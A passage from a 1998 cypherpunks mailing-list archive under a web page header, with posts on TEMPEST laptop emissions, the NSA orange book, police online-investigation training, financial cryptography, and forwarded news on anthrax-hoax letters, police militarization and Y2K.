					Click Image to Jump to Next Article 
					Go to Text Only Print Version 
				
			
			
			Black and White Test
			of Cryptographic Algorithms
			by William H. Payne
			This article requires special formatting.
			Please Click Here to Read
			
				Send This Article to a Friend:
				
					
						
						 
					
						
							Your Name:
					
					
						
							
					
				
				
					 
					
						
							Email Address of your Friend: 
					
					
						
							
					
				
				
					 
					
						
							Your Email address:
					
					
						
							
					
				
				
					 
					 
					 
				
				
					 
					
						
							
					
				
			
			 
			Back to Home Page
			Quick Menu 
			Visit the Button Shop 
			
			
			Interactive Forum
			Black and White Test
			of Cryptographic Algorithms
			
			
			
			
			
			E-mail the Editor
			
			
			
			
			
			
			 
		
	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trei, Peter" <ptrei@securitydynamics.com>
Date: Mon, 2 Nov 1998 23:37:09 +0800
To: "'Lucky Green'" <bill.stewart@pobox.com>
Subject: RE: TEMPEST laptops
Message-ID: <D104150098E6D111B7830000F8D90AE82406B7@exna02.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain





> -----Original Message-----
> From:	Lucky Green [SMTP:shamrock@cypherpunks.to]
> Sent:	Sunday, November 01, 1998 8:33 PM
> To:	Bill Stewart
> Cc:	cypherpunks@cyberpass.net
> Subject:	Re: TEMPEST laptops
> 
> On Sun, 1 Nov 1998, Bill Stewart wrote:
> [...]
> > Just using a regular laptop isn't enough; I've seen laptops
> > transmit recognizable images to a television (though I was probably
> > using AC power rather than batteries, and may or may not have had
> > the display mode set to LCD-and-monitor.)
> 
> Thanks for touching on the popuar myth that laptops radiate less than
> CRT's. Many laptops in fact radiate more compromising emissions than
> CRT's. Ross Anderson does his van Eck demos to undergrads using a laptop,
> because it works so much better than CRT's.
> 
> -- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
	  
	Nearly all laptops have a built-in video port, for connection
	to an external monitor. This is often poorly shielded (usually
	just a plastic plug). I'd be curious to know how much the
	radiation from this port could be attenuated by (1) a metal
	plug contacting the laptop's ground plane, and (2) removing
	all the video-port specific circuitry (major surgery for a
	laptop :-( ).


	Peter Trei




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Tue, 3 Nov 1998 03:03:37 +0800
To: cypherpunks@cyberpass.net
Subject: Re: TEMPEST laptops
Message-ID: <363DF8EB.24CF@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



> Understand that my comments are just some "common sense with a little 
> bit of physics" estimates, not direct knowledge of how best to shield 
> laptops.

> I'd do this in preference to worrying about what some 1978 government 
> docs had to say about the subject. TEMPEST the specs are probably a 
> mixture of "RF shielding" tips and standards, and a mix of Van Eck 
> radiation tuner designs.
>
A long time ago I ran thermal measurement boards on a piece of equipment
in liquid He under vacuum. Pretty icy. I used only standard components. 

My question is this - anyone know of any estimates of how weak a signal
could be detected and actually rendered into useful information? 

The relevance of the low-T stuff is that it seems like a nice way to
make low-noise receiving equipment. With an estimate of the capabilities
of the receiver ( @exotic-lHe and commonplace-lN2 temps ) you could then
address the emissions of the laptop with reasonable, quantitative target
levels. Sort of reverse engineer the TEMPEST specs as it were. 

It would be nice to know what needed to be done to reduce emissions to
the point that you could be fairly sure that an eavesdropper had to park
on your doorstep to make his equipment work.

> VERY FEW PEOPLE CARE ABOUT SECURITY.
>
Since they don't have anything to hide, why should they worry? Argh.
ergo - if they're hiding something they are guilty of something. Bust
the doors down boys.

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul H. Merrill" <PaulMerrill@acm.org>
Date: Tue, 3 Nov 1998 00:41:22 +0800
To: bill payne <billp@nmol.com>
Subject: Re: orange book
In-Reply-To: <363DCA2B.7C4E@nmol.com>
Message-ID: <363DFD9C.C7C55E44@ACM.Org>
MIME-Version: 1.0
Content-Type: text/plain



No, like the title says, that is "NOT The Orange Book".  Many (read all)
of the people I worked with at WPAFB and the contractor sites were
confused by the deluge that NCSC put out and called the Rainbow Series. 
In an attempt to give clues to the realities involved, I wrote the
condensations and then wrapped a body around the skeleton formed by
them.

If one reads the information there, one will see that that is what it
purports to be.

NTOB is not a site, it is the title of the book (paper published with an
orange cover, of course).  ((I thought of using cyan (not.orange) but no
one got the joke but the squints and precious few of them.)

Of course, not having seen what Sandia was givn, I an only assume that
DOD 5200.28-STD is what Sandia was given.  It IS what was I was working
from, along with the other toys put out by various governmental bodies.  

PHM



bill payne wrote:
> 
> Monday 11/2/98 7:55 AM
> 
> PaulMerrill@ACM.Org
> 
> I looked at the orange book at NOT the Orange Book -
> http://www.jya.com/ntob.htm
> 
> NSA employee Tom White http://jya.com/nsasuit.txt got me a copy of I was
> told was
> THE NSA orange book for Sandia's implementation of the NSA Benincasa
> nss/uso authentication algorithm..
> 
> The report I saw was concerned about implementation of cryptographic
> units.
> 
> Things like shielding, power filtering, red-black boundaries, shift
> register
> compromising signals, some software guidelines,....  The soft-cover
> report was mostly
> hardware-oriented.
> 
> What I see at jya.com is not the orange book Sandia was given.
> 
> bill payne
<<snip>>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Tim May)
Date: Tue, 3 Nov 1998 04:50:46 +0800
To: cypherpunks@cyberpass.net
Subject: Sex, Terrorism and the NET
Message-ID: <199811022004.MAA19140@always.got.net>
MIME-Version: 1.0
Content-Type: text/plain




I know there are some here who think Cypherpunks should cooperate with law
enforcment and do "reach outs" to such folks...this was a theme at some
past CFP Conferences, for example. 

I think most cops will use anyone they can. Meanwhile, this is what
they're doing.

Entrapment, infiltration, participation in chat rooms and news groups, and
all the usual Red Squad stuff.

--Tim


> From: spranzint@aol.com (Spranz int)
> Newsgroups: alt.security.terrorism
> Subject: Sex, Terrorism and the NET
> Lines: 52
> NNTP-Posting-Host: ladder03.news.aol.com
> X-Admin: news@aol.com
> Date: 2 Nov 1998 13:29:57 GMT
> Organization: AOL http://www.aol.com
> Message-ID: <19981102082957.03067.00002747@ng117.aol.com>
> Xref: Sn alt.security.terrorism:3219
> 
> 
> 
> Sex, Terrorism and the Internet:
>         Inservice Workshop for Law Enforcement
> 
> 
> 
> 
> LEARN:  Who is the best Internet provider for you.
>              Techniques for creating a screen persona
>              How to verify and  use your on-line contacts to gather
vital intelligence
>              The latest Hacking techniques
> 
> EXAMINE:  Live and On-line...
>         Pedophiles, Swap Groups and White Slavery
>         Neo Nazi and Militia Movements
>         Latin American Revolutionaries
>         Nationalist Groups with both local and global operations
>         Militant Islamic Movements
> 
> PARTICIPATE IN: News groups and Chat Rooms
>                         World wide Web Sites, Links and Search Engines
>                         Hacking , Militia and Sex Trade Chatrooms around
the globe
>                         
> DISCOVER : Web sites offering detailed information on:
>                 procuring and using Nuclear, Chemical and Biological Agents 
> as well as satellite intelligence data .
>                     How to get "expert" advice
>                     How to procure  black market  items and conduct
investigations on
> the web
> 
> Curriculum includes:
> 
> Introduction to Cyberspace              Hacking and Cracking
> Sex and the Internet                            Student Explorations
> Learning Investigative Tools    Developing in house programs
> Exploring NEWSGROUPS            Monitoring and Identifying suspects
> Terror Organizations                    Creating a web persona
> 
> Fee: $ 50.00 includes class handouts and certificate
> Program includes an optional two hour online practicum following the
> presentation.
> 
>         FDLE Approved for Second Dollar Spending and Mandatory Retraining!
> Location: Coral Springs Police Dept, Coral Springs FL
> 
> Date: Friday 4 December 1999  / 0830 - 1230  (4 instruction hours)
> To Register: Contact a Spranza Representative at: 
> POB 26047 Tamarac, FL 33320
> Voice: (954) 722 - 5811  email: Spranzint@aol.com fax: (954) 720 - 4472
> Visit our website: http://members.aol.com/spranzint/pubpage.htm for more info!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Tue, 3 Nov 1998 05:11:45 +0800
To: cypherpunks@cyberpass.net
Subject: No Subject
Message-ID: <487987985c0f857e82f678740b802bd9@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



Might as well include the laptop with the box,
including an encrypted filesystem and some software
and hardware booby trap features.

Whitecap




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 3 Nov 1998 03:34:19 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Techno Warfare In The 21st Century (fwd)
Message-ID: <199811021837.MAA01250@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:
>From consim-l-return-17237-ravage=ssz.com@net.uni-c.dk Mon Nov  2 12:19:37 1998
Mailing-List: contact consim-l-help@net.uni-c.dk; run by ezmlm
Reply-To: consim-l@net.uni-c.dk
Delivered-To: mailing list consim-l@net.uni-c.dk
From: HBtLF@aol.com
Message-ID: <b4455e8.363df7e5@aol.com>
Date: Mon, 2 Nov 1998 13:20:21 EST
To: consim-l@net.uni-c.dk
Mime-Version: 1.0
Subject: Techno Warfare In The 21st Century
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7bit
X-Mailer: AOL 4.0 for Windows 95 sub 214

Dear consimers,

When I'm not playing or designing wargames, I produce documentary programs for
television. I'm considering whether to produce a documentary on the topic of
technology and weaponry. Specifically, I want to look at how computer networks
can be used in warfare. I grew up on SAC bases, so I've seen that side of it
(computers controlling missile systems, for example). 

I'm more interested in how cyberwarfare might be conducted over the Internet
to bring down an opponent's infrastructure (or play havoc with economic
activity such as stock markets). James Adams' new book "Computers Are The
Weapons and The Front Line Is Everywhere" is the type of material I am trying
to find. I would urge any consimmers with suggestions to contact me at
hbtlf@aol.com Thanks in advance.

David Bolt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Tue, 3 Nov 1998 07:16:55 +0800
To: "'cypherpunks@cyberpass.net>,       "'e$@vmeng.com'" <e$@vmeng.com>
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone Alternative
Message-ID: <5F152E6E8E6FD21195DF00104B2425AD02B226@yarrowbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




> paradox of financial cryptography, and, more specifically, 
> digital bearer settlement, is not that it gives you privacy 
> and freedom (anarchy? :-))

Anarchy != privacy

In fact to many people privacy is a very statist construct, as they clamor
for more privacy regulations by government. The contradiction is government
has a vested interest in preventing privacy from itself, and generally makes
loud but ineffectual noise in creating privacy from others.

There are many anarchic elements financial cryptography, such as:

* That you can achieve greater privacy through cryptographic means instead
of government means by limiting the information transfer via zero knowledge,
blinding, cryptographic pseudonymity, etc.

* That you can exchange money in ways that are secured cryptographically and
settled instantly that do not rely on the government as
observer/auditor/enforcer[/taxer].

* You can create private currencies that do not rely on government goodwill
and stability to retain their value.

* That you can enforce contracts via electronic mediation and reputation
punishment in a way that does not rely on biometric ID and government
mediation/enforcement.

Therefore traditionally archical processes become anarchical (without state
[involvement]). It is the *process*, not the result that is anarchic, and it
is the process, not the result, that is cheaper. Cryptography (cpu-cycles)
is cheaper than government, with a falling cost versus a rising one.

Will all these free anarchical processes eventually result in an anarchic
state? Maybe. But the economics of the processes is the prime mover, the
politics of the result is a consequence.

	Matt









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "X" <xasper8d@lobo.net>
Date: Tue, 3 Nov 1998 06:38:00 +0800
To: "Tim May" <cypherpunks@cyberpass.net>
Subject: RE: Sex, Terrorism and the NET
In-Reply-To: <199811022004.MAA19140@always.got.net>
Message-ID: <001601be06aa$1bf80a80$852580d0@ibm>
MIME-Version: 1.0
Content-Type: text/plain



Tim May wrote:

~> -----Original Message-----
~> From: owner-cypherpunks@minder.net
~> [mailto:owner-cypherpunks@minder.net]On Behalf Of Tim May
~> Sent: Monday, November 02, 1998 1:05 PM
~> To: cypherpunks@cyberpass.net
~> Subject: Sex, Terrorism and the NET
~>
~> I know there are some here who think Cypherpunks should
~> cooperate with law
~> enforcment and do "reach outs" to such folks...this was a theme at some
~> past CFP Conferences, for example.
~>
~> I think most cops will use anyone they can. Meanwhile, this is what
~> they're doing.
~>
~> Entrapment, infiltration, participation in chat rooms and news
~> groups, and
~> all the usual Red Squad stuff.
~>
~> --Tim

Good points.  How many of those who receive cpunx email are LEA?  10%?  15?
20?  Let's all sneak out and see how long they keep the lights off before
figuring out the party's empty!

X




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 3 Nov 1998 08:28:36 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Farah: The cops are out of control
Message-ID: <199811022344.PAA28323@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: E Pluribus Unum <eplurib@infinet.com>
Subject: IP: Farah: The cops are out of control
Date: Fri, 30 Oct 1998 19:39:20 -0500
To: E Pluribus Unum Email Distribution Network <eplurib@infinet.com>

The cops are out of control 
                   

                    Until very recently, as a law-abiding person, the
                    presence of police generally gave me a feeling of
                    security, well-being, order. 

                    Not any more. I confess that, lately, when I see a
                    cop in my rear-view mirror, I get a very uneasy
                    feeling. 

                    Maybe it's the horror stories we're hearing.
                    Maybe it's the way local and state police have
                    become little more than appendages of the
                    federal law-enforcement apparatus. Maybe it's
                    the fact that so many cops have taken sides
                    against the Constitution and the rights of the
                    people in the name of more efficient
                    crime-prevention. 

                    But the recent incidents in Oklahoma, where
                    police shot an unarmed mother holding her child
                    in her home, in Virginia, where a SWAT team
                    killed a watchman guarding a dice game at an
                    after-hours club and in California, where a
                    Bureau of Alcohol, Tobacco and Firearms raid on
                    a gun shop resulted in the death of the
                    shopkeeper, provide some hard evidence that
                    police in America may be getting out of control 

                    I think also about columnist Geoff Metcalf's
                    anecdote about the law-abiding man arrested
                    and jailed for having in his possession a tire
iron,
                    which was classified as a deadly weapon. Had
                    he brandished it? No. Had he threatened
                    anyone? No. Had the California Highway Patrol
                    officer awakened on the wrong side of her bed
                    that morning? Maybe. 

                    But when you start putting all these incidents
                    together, with the backdrop of the massacre in
                    Waco, Texas, and the unnecessary shootout at
                    Ruby Ridge, it's no wonder Americans like me
                    are beginning to worry about the possibilities of
                    an emerging police state. 

                    "Oh, it couldn't happen here," some retort.
                    "America is different. The cops are our friends." 

                    That may have been true through most of our
                    history. But there's one big difference today. The
                    government no longer trusts the people. There is
                    a move to disarm the populace and to entrust our
                    safety solely to professional law enforcement.
                    This is a pattern we've seen in other
                    authoritarian and totalitarian regimes. It's a
                    prerequisite to the formation of a police state.
It's
                    what our Founding Fathers warned us about. It's
                    why we have a Second Amendment. 

                    One of the other problems we face in America
                    today is the increasing number of laws on the
                    books designed to turn virtually everyone into a
                    law-breaker. 

                    It's easier for cops today to fill their quota of
                    arrests and citations by targeting
                    non-threatening, non-violent citizens than it is
                    actually chasing down violent criminals. Too
                    often, today's cops make no distinction between
                    hardened, professional criminals, and people
                    who may or may not be in technical violation of
                    the law -- perhaps even an unjust,
                    unconstitutional law. 

                    But the biggest danger we face is the
                    federalization and militarization of all law
                    enforcement. Inter-agency task forces, bringing
                    together local and state police with federal
agents
                    are now the rule of the day. Federal agencies
                    bribe local cops with funding, equipment and
                    training programs. 

                    America is rapidly becoming an "us vs. them"
                    society -- with the cops and government on one
                    side and the people on the other. Many of us
                    don't feel the heat yet. But it's just a matter of
                    time before we're all confronted with the harsh
                    realities of the new emerging police state. 

                    One of these days -- and it may be sooner rather
                    than later -- America is going to be confronted
                    with a real domestic emergency. It's not a matter
                    of if, but when. We've had precious few real
                    domestic crises throughout our history, and
                    Americans have become spoiled. Thus, we take
                    our freedoms for granted. 

                    There are so many possibilities and excuses on
                    the horizon -- Y2K, terrorism, the threat posed by
                    weapons of mass destruction from rogue states as
                    well as China and Russia. 

                    Will America respond to the next crisis in a way
                    that preserves our civil rights and liberties? Or
                    will we lose our tentative grasp on freedom --
                    giving up an illustrious tradition for the sake of
                    security, safety, order? 

                    If we're to maintain any semblance of freedom in
                    the worst of times, we must hold the government
                    and police accountable in the best of times. 
                   

                    A daily radio broadcast adaptation of Joseph
Farah's
                    commentaries can be heard at http://www.ktkz.co
-- 
******************************************************************
       E Pluribus Unum            The Central Ohio Patriot Group       
       P.O. Box 791          Eventline/Voicemail: (614) 823-8499  
       Grove City, OH  43123                                      

       Meetings:  Monday Evenings, 7:30pm, Ryan's Steakhouse         
       3635 W. Dublin-Granville Rd. (just East of Sawmill Rd.)    
   
http://www.infinet.com/~eplurib          eplurib@infinet.com     
******************************************************************


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 3 Nov 1998 08:26:21 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Anthrax Scare
Message-ID: <199811022344.PAA28334@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Anthrax Scare
Date: Fri, 30 Oct 1998 18:39:22 -0600
To: believer@telepath.com

Source:  Indianapolis Star News
http://starnews.com/news/citystate/98/oct/1030SN_anthrax.html 
  
   Letter claims it was 
   contaminated with Anthrax 
   29 people are contained, decontaminated at 
   Planned Parenthood clinic 
  
   By Stephen Beaven 
   Indianapolis Star/News 

   INDIANAPOLIS (Oct. 30, 1998) -- At least 29 
   people were treated Friday afternoon for 
   possible exposure to the deadly biological toxin 
   Anthrax at a Planned Parenthood clinic at East 
   21st Street and Ritter Avenue. 

   The FBI confirmed late Friday afternoon that 
   clinics in New Albany and Bloomington 
   received similar threats. 

   The Planned Parenthood eastside clinic received 
   a letter shortly after 1 p.m. with a simple 
   message -- you have been exposed to Anthrax, 
   according to the Indianapolis Fire Department. 

   Police and health and safety workers swooped in 
   soon after to quarantine the people in the 
   building. At least a dozen professionals from the 
   fire department's hazardous materials team 
   entered the building in white decontamination 
   suits with surgical masks and safety glasses to 
   treat those inside. 

   After being scrubbed down, the people in the 
   clinic were being taken to area hospitals late 
   Friday afternoon. 

   "The last thing we want to do is contaminate a 
   hospital," said one police official on the scene. 
   "No one is showing symptoms at this time, but 
   they are scared and upset." 

   A worker at the clinic opened a plain beige 
   envelope with a Cincinnati postmark Friday 
   afternoon. Inside there was a simple letter with 
   the threat. 

   It was unclear if the letter actually contained 
   Anthrax, which is generally used in biological 
   warfare and terrorism. 

   But even if it was a hoax, it looked real, 
   according to IFD Lt. Jack Cassaday. 

   "It looked like Anthrax so whoever sent it knew 
   enough to package it the right way," he said. 

   It has not been confirmed that the letter indeed 
   was contaminated with Anthrax. The substance 
   was being tested at a local lab, Cassaday added. 

   The bacteria Anthrax has flu-like symptoms 
   which do not surface until one to six days. 

   The symptoms are high fever, chest pains and 
   hemmoraging. 
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 3 Nov 1998 08:29:33 +0800
To: cypherpunks@cyberpass.net
Subject: IP: 18-year-old rebels against being numbered
Message-ID: <199811022344.PAA28344@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: E Pluribus Unum <eplurib@infinet.com>
Subject: IP: 18-year-old rebels against being numbered
Date: Fri, 30 Oct 1998 19:43:27 -0500
To: E Pluribus Unum Email Distribution Network <eplurib@infinet.com>

YOUR PAPERS, PLEASE ... 
                   18-year-old rebels 
                   against being numbered 
                   Wins right to vote 
                   without Social Security registration 
                   

                   By David M. Bresnahan 
                   Copyright 1998, WorldNetDaily.com

                   LAS VEGAS, NV -- Even though government
                   agencies tried their best to stop him, an
                   18-year-old will vote for the first time in the
Nov.
                   3 election.

                   Last July, Joshua Hansen, 18, went to register to
                   vote. A few days later he received a letter in the
                   mail from Kathryn Ferguson, registrar of voters
                   of Clark County, Nevada, rejecting his
                   application.

                   Hansen had refused to supply a Social Security
                   number on his application and Ferguson rejected
                   him as a voter.

                   Hansen says he does not have a Social Security
                   number, driver's license, or government issued ID
                   card. He says that he never will. He also refuses
                   to pay income tax.

                   He defends his stands on these issues based on
                   his study of the U.S. Constitution and his
                   religious beliefs. He says he is willing to pay any
                   price and will not give in to government
                   pressure.

                   Hansen takes his right to vote seriously. So
                   seriously that he took Ferguson to court to prove
                   his point. With the help of his uncle, attorney
Joel
                   F. Hansen, he got the court to order Ferguson to
                   permit him to vote.

                   He belongs to the First Christian Fellowship of
                   Eternal Sovereignty, which he says is a political
                   religion based on Christianity and the
                   Constitution which people of all denominations
                   may join.

                   "It's a fellowship of anybody who's Christian
                   who really exercises their Christian beliefs within
                   politics," explained Hansen in a phone interview
                   with WorldNetDaily.

                   "The Social Security number was much like the
                   mark of the beast talked about in the "Book of
                   Revelations." One of the main reasons is that it, I
                   mean you can't buy or sell without it, it's hard to
                   do a lot of business without it. Have you ever
                   tried to get a job without one, or voting or
                   anything? A lot of the stuff talked about in the
                   prophecy had come to life and I said, 'I don't
                   want one of those.'

                   "Everything around Social Security is a lie. I
don't
                   want any of the benefits from it and I don't want
                   to pay for it. The system's going bankrupt.
                   Anything I pay for I'll never see anyway. It's
                   blatantly unlawful and unconstitutional,"
                   explained Hansen. 

                   Living without a Social Security number is a
                   challenge, but not a major problem for Hansen.
                   He has no bank account, works only for family
                   members who will pay him "under the table,"
                   refuses to get a driver's license, and won't pay
                   taxes. Recently he started his own Internet
                   consulting business.

                   He just finished high school this year and says he
                   has very few friends who believe as he does. He
                   belongs to the Church of Jesus Christ of
                   Latter-day Saints.

                   "Because of my political beliefs," says Hansen, "I
                   have a lot of trouble getting along at church with
                   a lot of my fellow members." The members of his
                   church believe in "The Articles of Faith," a
                   portion of it reads "We believe in . . . obeying,
                   honoring, and sustaining the law."

                   "They told me that the law said I had to have a
                   number," explains Hansen. "I said, 'This is kind of
                   stupid because all these numbers are obtained
                   through the identification I already have.' When
                   you get a driver's license or an ID card here,
                   basically you show them your birth certificate,
                   and to prove residency you write down on a little
                   paper what your address is and sign something
                   that says you're not lying, which is all you do on
                   a voter registration thing."

                   Ferguson didn't like Hansen's logic. She rejected
                   his application to vote. Hansen contacted many
                   elected officials for help. Some responded and
                   some didn't, but none were of much help so he
                   decided to take it to court.

                   "The Constitution of Nevada establishes who can
                   vote," explained Hansen. "If you're an idiot,
                   you're insane, and if you don't have residency
                   you can't vote. That's it."

                   Hansen filed a Writ of Mandamus in the Clark
                   County District Court. The purpose was to have
                   the court order Ferguson to register Hansen so he
                   can vote.

                   Nevada law states that the "County Clerk shall
                   require a person to submit official identification
                   as proof of residence and identity, such as a
                   driver's license or other official document before
                   registering him."

                   Hansen presented a diploma from high school
                   and a birth certificate, but Ferguson demanded a
                   Social Security card, driver's license, or a state
ID
                   card.

                   Hansen does not have those items and in his
                   petition to the court his attorney stated,
                   "therefore, he presented alternative identification
                   to the Registrar of Voters, but his right to
register
                   to vote was refused and denied by the county
                   registrar of voters."

                   Hansen was more surprised than anyone when
                   his petition was granted by the court. "I didn't
                   think I'd win," he said. On Oct. 19, the court
                   ordered Ferguson to register Hansen to vote, and
                   he now plans to cast his first ballot on Nov. 3.

                   This may be just the first of many battles ahead
                   for Hansen. He does drive a car, and does not
                   plan to get a license.

                   "The government has no right to regulate who
                   can and cannot drive unless they have proven
                   themselves to be a danger to the community and
                   have been convicted by 12 informed jurors,"
                   wrote Hansen in an e-mail message to
                   WorldNetDaily.

                   "Assuming that everyone is already a danger and
                   by telling us we must have a license to drive is
                   known better as 'prior restraint' and according to
                   the U.S. Supreme Court is unconstitutional."

                   Hansen also objects to the current law which will
                   implement a national ID card on Oct. 1, 2000. He
                   says that Congress passed the law using illegal
                   immigration control as the excuse.

                   "The even more ironic twist is that most of the
                   illegal immigrants coming here are filtering from
                   Mexico trying to reap the socialist benefits
offered
                   by the federal government. Welfare, government
                   schools, health care, social security, etc. If you
                   want to stop illegal immigration bring back the
                   American way of work hard and succeed as
                   opposed to show up and leech off the tax
                   payers," wrote Hansen.

                   He concluded his e-mail by saying, "There is
                   nothing they can ever do to make me surrender
                   my personal freedom, nothing. I don't know a lot
                   of people who exercise freedom to the point of
                   fanaticism I do. I will not pay federal income tax,
                   I will not be marked my their unconstitutional
                   anti-Christ numbers. I will not take any of their
                   socialist benefits. I will not bow before any
                   bureaucracy. I will not surrender my God-given
                   freedom to those bastards for any reason."

                   David Bresnahan is a contributing editor of
                   WorldNetDaily.com, and is the author of "Cover
                   Up: The Art and Science of Political Deception."
You
                   may e-mail him at David@talkusa.com 
-- 
******************************************************************
       E Pluribus Unum            The Central Ohio Patriot Group       
       P.O. Box 791          Eventline/Voicemail: (614) 823-8499  
       Grove City, OH  43123                                      

       Meetings:  Monday Evenings, 7:30pm, Ryan's Steakhouse         
       3635 W. Dublin-Granville Rd. (just East of Sawmill Rd.)    
   
http://www.infinet.com/~eplurib          eplurib@infinet.com     
******************************************************************


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 3 Nov 1998 08:24:51 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Sen. Moynihan Warns of Y2K Catastrophe
Message-ID: <199811022344.PAA28355@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Sen. Moynihan Warns of Y2K Catastrophe
Date: Sat, 31 Oct 1998 08:42:26 -0600
To: believer@telepath.com

Source:  http://www.senate.gov/~y2k/statements/100798moynihan.html

Senator Daniel Patrick Moynihan, Senate Special Committee on the Year 2000
Technology Problem (Oct. 7).
 
As we wind up the last Year 2000 (Y2K) hearing of this Congress, I would
like to commend Senator Bennett and the Special Committee for its work in
addressing the computer problem. The Committee has done a fine job in
looking at all the aspects of society that the Y2K problem affects: the
utilities industry, the heath sector, financial services, transportation,
government, and businesses. The Committee should also be applauded for the
role it played in formulating and passing S. 2392, The Year 2000
Information and Readiness Disclosure Act. As an original cosponsor of this
piece of legislation, I am pleased to see that its enactment is soon at
hand. The head of the President's Council on Y2K, John Koskinen, said that
passing this bill is one of the most important things that we could do on
the Y2K front. I agree. I say well done to the Committee for all of the
work it has done in such a short amount of time. 

It was almost two and a half years ago that I sounded the alarm on the
computer problem. On July 31, 1996, I sent President Clinton a letter
expressing my views and concerns about Y2K. I warned him of the ``extreme
negative economic consequences of the Y2K Time Bomb,'' and suggested that
``a presidential aide be appointed to take responsibility for assuring that
all Federal Agencies, including the military, be Y2K compliant by January
1, 1999 [leaving a year for `testing'] and that all commercial and
industrial firms doing business with the Federal government must also be
compliant by that date.'' 

January 1, 1999 is quickly approaching. I believe that we have made
progress in addressing the computer problem and that the ``Good Samaritan''
legislation will play a significant role in ameliorating this problem. But
much work remains to be done. For the next 450 days we must continue to
work on this problem with dedication and resolve. 

Historically, the fin de siecle has caused quite a stir. Until now,
however, there has been little factual basis on which doomsayers and
apocalyptic fear mongers could spread their gospel. After studying the
potential impact of Y2K on the telecommunications industry, health care,
economy, and other vital sectors of our lives, I would like to warn that we
have cause for fear. For the failure to address the millennium bug could be
catastrophic.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 3 Nov 1998 08:25:25 +0800
To: cypherpunks@cyberpass.net
Subject: IP: FBI: Anthrax Threat Likely a Hoax
Message-ID: <199811022344.PAA28366@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: FBI: Anthrax Threat Likely a Hoax
Date: Sat, 31 Oct 1998 09:35:33 -0600
To: believer@telepath.com

Source:  Washington Post
http://www.washingtonpost.com/wp-srv/digest/nat004.htm

FBI: Anthrax Threat to Abortion Clinics Likely a Hoax 

By John Kelly
Associated Press Writer
Friday, October 30, 1998; 9:20 p.m. EST 

INDIANAPOLIS - Four abortion clinics in three states received letters
Friday claiming to contain deadly anthrax bacteria, prompting the
evacuation of the Indianapolis clinic and sending at least 33 people to
hospitals, authorities said. 

Clinics in New Albany, Louisville, Ky., and Knoxville, Tenn., also
received letters, Planned Parenthood and federal officials said. All of the
letters bore Cincinnati postmarks. 

The clinic in New Albany, across the river from Louisville, was not
evacuated because the letter was not opened, authorities said. A letter
sent to a clinic in Bloomington later was determined to contain business
correspondence and was not a threat, local police said. 

An employee of the Louisville clinic and the mail carrier who delivered that
letter were taken to the University of Louisville Hospital, treated and
released. 

"The initial investigation has clearly indicated that the substance is
unlikely
to be anthrax," FBI agent Carl Christiansen said. 

The FBI is investigating a similar threat at the Knoxville Reproductive
